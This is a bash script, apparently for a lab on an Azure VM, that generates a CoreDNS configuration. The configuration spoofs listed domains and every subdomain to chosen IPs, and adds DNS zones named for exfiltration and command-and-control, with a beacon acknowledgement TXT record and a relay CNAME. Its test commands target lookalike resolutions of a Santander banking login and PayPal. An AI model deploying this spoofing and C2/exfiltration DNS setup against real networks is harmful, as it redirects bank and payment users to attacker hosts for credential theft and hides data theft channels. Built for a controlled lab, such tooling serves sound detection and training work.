#!/bin/bash
# =============================================================================
# setup_coredns.sh  (v2 – uses CoreDNS template plugin, no zone files)
# =============================================================================
# Reads spoofing.conf and builds a Corefile where every spoofed domain is
# handled by the CoreDNS `template` plugin.  This captures the apex domain
# AND every subdomain at any depth without requiring separate zone files.
#
# Usage (on Azure VM as root):
#   chmod +x /etc/coredns/setup_coredns.sh
#   sudo bash /etc/coredns/setup_coredns.sh
# =============================================================================

set -euo pipefail

CONF="/etc/coredns/spoofing.conf"
COREFILE="/etc/coredns/Corefile"

# ── Step 1: Write Corefile header ─────────────────────────────────────────────
echo "[*] Rebuilding Corefile..."

# Use printf > file so no heredoc quoting issues at all
printf '# Auto-generated by setup_coredns.sh – DO NOT EDIT MANUALLY\n' > "$COREFILE"
printf '# Edit spoofing.conf and re-run setup_coredns.sh instead.\n\n' >> "$COREFILE"

# ── Step 2: One template block per spoofed domain ─────────────────────────────
echo "[*] Generating spoofed domain blocks..."

while IFS= read -r line || [[ -n "$line" ]]; do
    # Skip comments and blank lines
    [[ "$line" =~ ^#.*$ || -z "${line// }" ]] && continue

    domain=$(echo "$line" | awk '{print $1}')
    ip=$(echo "$line" | awk '{print $2}')

    [[ -z "$domain" || -z "$ip" ]] && continue

    echo "    [+] $domain → $ip"

    # Write block using printf – no heredoc, no shell expansion of {{ }}
    printf '%s {\n' "$domain" >> "$COREFILE"
    printf '    template IN A {\n' >> "$COREFILE"
    printf '        answer "{{ .Name }} 0 IN A %s"\n' "$ip" >> "$COREFILE"
    printf '    }\n' >> "$COREFILE"
    printf '    template IN AAAA {\n' >> "$COREFILE"
    printf '        rcode NXDOMAIN\n' >> "$COREFILE"
    printf '    }\n' >> "$COREFILE"
    printf '    log\n' >> "$COREFILE"
    printf '    errors\n' >> "$COREFILE"
    printf '}\n\n' >> "$COREFILE"

done < "$CONF"

# ── Step 3: Fixed blocks for exfil.lab, c2.lab and default forwarder ──────────
# Single-quoted heredoc: bash does NOT expand anything inside it.
cat >> "$COREFILE" <<'FIXED_BLOCKS'
exfil.lab {
    template IN A {
        answer "{{ .Name }} 0 IN A 203.0.113.100"
    }
    log
    errors
}

c2.lab {
    template IN A {
        answer "{{ .Name }} 0 IN A 198.51.100.100"
    }
    template IN TXT {
        answer "{{ .Name }} 0 IN TXT \"beacon_ack_1234\""
    }
    template IN CNAME {
        answer "{{ .Name }} 0 IN CNAME relay.c2.lab."
    }
    log
    errors
}

. {
    forward . 8.8.8.8 8.8.4.4
    cache 30
    log
    errors
    health :8080
}
FIXED_BLOCKS

echo "[*] Corefile written to $COREFILE"

# ── Step 4: Restart CoreDNS ───────────────────────────────────────────────────
if systemctl list-units --all coredns.service 2>/dev/null | grep -q coredns; then
    echo "[*] Restarting CoreDNS..."
    systemctl restart coredns
    sleep 2
    systemctl status coredns --no-pager -l
else
    echo "[!] CoreDNS service unit not found – copy coredns.service to /etc/systemd/system/ first"
fi

echo ""
echo "[OK] Setup complete. Test with:"
echo "     dig @$(hostname -I | awk '{print $1}') google.com +short"
echo "     dig @$(hostname -I | awk '{print $1}') login.bancosantander.es +short"
echo "     dig @$(hostname -I | awk '{print $1}') deep.sub.paypal.com +short"
echo "     dig @$(hostname -I | awk '{print $1}') chunk1.exfil.lab +short"
echo "     dig @$(hostname -I | awk '{print $1}') beacon1.c2.lab +short"
